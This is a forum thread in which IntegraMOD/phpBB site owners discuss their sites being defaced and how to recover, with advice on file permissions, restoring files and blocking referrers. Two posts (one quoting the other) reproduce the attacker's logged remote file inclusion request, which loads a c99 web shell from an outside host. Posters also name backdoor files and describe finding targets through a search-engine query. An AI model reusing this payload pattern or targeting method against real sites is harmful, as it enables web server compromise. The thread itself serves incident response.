I was Hacked

[psyperu]

I cant acces to Admin Panel

only show this message

Hacked By CyberLord FOR ISLAM

Any solution <img>

my web is http://www.vuelamaria.com/portal

[Bush]

Reinstall <img>

[suicico]

just today i got hacked as well ..
i wasnt able to load my site at all .
so i went to my latest visitors page and i noticed that the visitor with the i.p : 172.151.112.178
was fooling around with functions.php .
to be more precise here is an example
/includes/functions_portal.php?phpbb_root_path=http%3A%2F%2Ftz4rr.webcindario.com%2Fc99shell.gif%3F&act=img&im
the other think to get you suspicious is that this person came refered from google with the search "Powered by integramod"
Well this dude had deleted the content of portal.php so the solution was to overwrite it, and all came back to normal ..
just pay attention now and then to your referals .

edit. the dude did the same to index.php

[InoculateIT]

Did you CHMOD the files?

CHMOD all files 644 exept the ones mentioned in the integramod_install_guide_page1.htm

I have never been hacked <img>

[suicico]

intresting advice (lol) silly me you are right
btw .. i just got hacked again .. this time from a turkish hacker called (na i would not give him credit for this) and again was a silly xploid ..
anyhow thx

[Solomon]

One of my sites was hacked today too.


I also found a file named c99.php in the backup folder. Contents are too long to post. I'd say this is more than just a coincidence this many Integramod sites were kiddie hacked today.

[honie]

I got it today too... but my config file seems fine & Ive restored the database & portal & index files & its still there. Argh. Any ideas ? Im at http://www.policewives.org

[jwernerny]

c99.php is a backdoor hacker script that is installed to writable directories. I had another version of it on my site a while back and it keeps trying to come int. It was called musa.php then.

Anyone want to share what hosting service their sites were on?

- John

[Solomon]

c99.php is a backdoor hacker script that is installed to writable directories. I had another version of it on my site a while back and it keeps trying to come int. It was called musa.php then.

Anyone want to share what hosting service their sites were on?

- John

I just whiped out musa.php right before you posted. Your asking what hosting service, is this relevant for prevention? In other words, do some hosters block this backdoor script and others do not?

[honie]

Ive looked & I cant find either of those files, which directory would they be in?

BTW, my host is globat

[Solomon]

Ive looked & I cant find either of those files, which directory would they be in?

BTW, my host is globat

I honestly already forget, but try forum/modules/cache/explain/

also check /forum/includes/cache_tpls/

Look for files that were modified today that look fishy. Try comparing questionable files to previous complete backups or even stock Integramod files.

[odius]

yea i just restored my hacked site, just had to replace the config.php and i think it was cookies.php which was givin the errors about the include files bein messed.. or maybe it was the way i did config.php.. did it twice.

yea found bnc.txt in the backup folder.. im runnin integramod 1.4 with phpBB 2.0.19

my config WAS chmod 666, now its 644, i think thats fine????

is there an app like SFC.exe for winXP (system file checker) to check to see if there's any more crap they uploaded, and maybe somethin to check all the permissions too

[honie]

K, I checked there too & nothing weird. I am stumped I have no clue what to do next.

[Solomon]

just today i got hacked as well ..
i wasnt able to load my site at all .
so i went to my latest visitors page and i noticed that the visitor with the i.p : 172.151.112.178
was fooling around with functions.php .
to be more precise here is an example
/includes/functions_portal.php?phpbb_root_path=http%3A%2F%2Ftz4rr.webcindario.com%2Fc99shell.gif%3F&act=img&im
the other think to get you suspicious is that this person came refered from google with the search "Powered by integramod"
Well this dude had deleted the content of portal.php so the solution was to overwrite it, and all came back to normal ..
just pay attention now and then to your referals .

edit. the dude did the same to index.php

Yup, my referrals list shows:

Referrer Host: http://www.google.com.tr
Referrer URL: http://www.google.com.tr/search?q=Power ... rt=40&sa=N
Referrer IP: 85.102.183.32
[hr:30wm7usw]
Blocking http://www.google.com.tr & http://www.google.com.ru in the ACP/Security/Special/Block Referrers section wouldn't be a bad idea. <img>

[odius]

what versions are u guys runnin, are u not updated like me or what, lets fix this lol